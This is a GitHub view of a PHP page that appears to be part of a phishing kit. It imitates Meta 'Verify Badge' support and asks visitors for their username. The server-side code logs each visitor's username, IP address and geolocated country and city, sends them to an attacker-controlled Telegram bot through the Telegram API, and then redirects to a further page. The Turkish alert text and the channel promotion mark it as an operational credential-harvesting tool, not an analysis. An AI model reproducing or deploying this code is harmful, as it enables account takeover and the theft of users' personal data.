-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy path1.php
114 lines (93 loc) · 2.93 KB
/
1.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
<?php
if ($_POST) {
session_start();
$fore_user=$_POST["fore_user"];
$_SESSION["fore_user"]=$fore_user;
$ip=$_SERVER["REMOTE_ADDR"];
$konum = file_get_contents("http://ip-api.com/xml/".$ip);
$cek = new SimpleXMLElement($konum);
$ulke = $cek->country;
$sehir = $cek->city;
$site = $_SERVER["SERVER_NAME"];
date_default_timezone_set('Europe/Istanbul');
$cur_time=date("d-m-Y H:i:s");
require_once("admin/tg.php");
$data = [
'text' => '
Hesap Düşüyor...
kullanıcı adı : '.$fore_user.'
İp : '.$ip.'
Konum : '.$ulke.' / '.$sehir.'
Tarih : '.$cur_time.'
Katıl : @webservicesx
',
'chat_id' =>"$chatid"
];
file_get_contents("https://api.telegram.org/bot$token/sendMessage?" . http_build_query($data) );
header("Location:3.php?$fore_user");
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<link rel="stylesheet" href="https://pro.fontawesome.com/releases/v5.10.0/css/all.css" integrity="sha384-AYmEC3Yw5cVb3ZcuHtOA93w35dYTsvhLPVnYs9eStHfGJvOvKxVfELGroGkvsg+p" crossorigin="anonymous"/>
<link rel="stylesheet" href="css/style.css">
<title>-</title>
</head>
<body> <center>
</center>
<div class="forebaby">
<div class="yazi">
<br>
<br>
<img width="150" src="imgs/e.svg" alt="">
<br>
<br>
<p>Hello Dear User,
Type your username and continue to Verify Badge</p>
<form method="post"autocomplete="off">
<center>
<input type="text" class="inputs" name="fore_user" placeholder="Username" required="" >
</center>
<button id="bttn" type="submit" class="btn2" >Continue</button>
<br>
<br>
</form>
</div>
</div>
<center>
<div class="alt"><br>
<img width="150" src="imgs/ehe.png" alt="">
<br><br>
<p>For Meta Support and Complete message response please contact us best company and most robust Meta Verification Company</p>
<br><br>
</div>
</center>
<div class="enalt"> <br><br>
<div class="enaltig">
</div>
<div class="linksx">
<a href="#">Community Standarts</a> |
<a href="#">Data Policy</a> <br><br>
<a href="#">Terms</a>
|
<a href="#">Cookie Policy</a>
</div>
<br><hr color="#E0E0E0" size="0.1px" width="90%">
<br>
<div class="dil">
<p>Language English (US)</p>
</div>
<br>
</div>
<script src="jquery-3.6.0.js" ></script>
<script>
$( "form" ).submit(function( event ) {
$( "#bttn" ).html("<i id='loader' class='fa fa-spinner fa-spin'></i>");
});
</script>
</body>
</html>